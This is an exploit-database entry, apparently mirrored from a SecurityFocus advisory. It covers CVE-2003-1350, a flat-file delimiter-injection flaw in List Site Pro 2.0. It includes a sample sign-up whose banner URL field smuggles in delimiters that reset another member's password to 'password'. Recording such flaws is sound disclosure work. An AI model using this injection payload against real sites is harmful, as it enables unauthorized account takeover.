[] NeoSense
E X P L O I T S
title author type platform port cve id

List Site Pro 2.0 - User Database Delimiter Injection

Author: Statix
type: remote
platform: multiple
port: 
date_added: 2003-01-24 
date_updated: 2012-10-24 
verified: 1 
codes: CVE-2003-1350;OSVDB-59659 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/6685/info

List Site PRO is a top site ranking system that counts hits from member sites and then ranks them according to the number of hits.

A problem has been reported for List Site PRO that would allow an attacker to inject arbitrary values via html input form fields into the underlying flat-file database used by List Site PRO.

A malicious user could sign up like this:

username:username
email:email@emial.com
url:www.url.com
bannerurl:www.site.com/banner.gif ||password|%User_ID%|60|468
banner height:68
banner width:460
password:pass

To reset the sites,specified by %User_ID%,password to 'password'.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.